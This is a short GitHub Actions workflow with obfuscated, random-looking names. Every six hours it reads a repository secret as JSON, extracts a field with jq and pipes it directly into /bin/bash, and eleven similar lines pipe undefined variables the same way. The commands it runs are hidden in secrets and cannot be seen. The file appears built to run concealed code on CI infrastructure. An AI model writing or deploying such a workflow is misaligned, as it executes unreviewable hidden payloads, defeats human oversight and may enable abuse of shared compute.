name: gaozhizi7162

on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaozhizi7162
        env:
          hd967: ${{ secrets.hd967 }}
        run: |
          echo $hd967 | jq -r .nb07564 | /bin/bash
          echo $rqzqj750 | jq -r .crk67141 | /bin/bash
          echo $bnz151 | jq -r .stu3 | /bin/bash
          echo $mih8 | jq -r .jcdoh06117 | /bin/bash
          echo $rxxcp3113 | jq -r .xx81 | /bin/bash
          echo $bocyy481 | jq -r .nfba8617 | /bin/bash
          echo $avd21 | jq -r .yfc3729 | /bin/bash
          echo $aect3828 | jq -r .m4077 | /bin/bash
          echo $azxjy5 | jq -r .ng1 | /bin/bash
          echo $y8 | jq -r .joxn6867 | /bin/bash
          echo $dgz018 | jq -r .pvm098 | /bin/bash
          echo $htdb44 | jq -r .ygzqs5 | /bin/bash

